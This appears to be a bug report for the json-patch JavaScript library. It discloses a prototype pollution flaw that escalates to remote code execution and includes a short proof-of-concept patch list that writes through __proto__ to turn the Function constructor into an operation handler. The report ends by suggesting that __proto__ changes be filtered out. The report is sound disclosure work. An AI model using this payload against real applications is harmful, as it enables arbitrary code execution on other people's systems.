Prototype pollution / RCE vulnerability #30
Description
The code is vulnerable to prototype pollution, because it allows patching __proto__. This can be escalated to remote code execution if user-supplied input is passed as the patch list:
p = require('json-patch')
p.apply({}, [
{
"op": "copy",
"from": "/constructor/constructor",
"path": "/__proto__/makeFunc"
},
{
"op": "add",
"path": "/__proto__/op",
"value": "makeFunc"
},
]);
p.apply({},["console.log('rce')"]) // rceIn order to prevent this, I would adivse filtering out any changes to __proto__.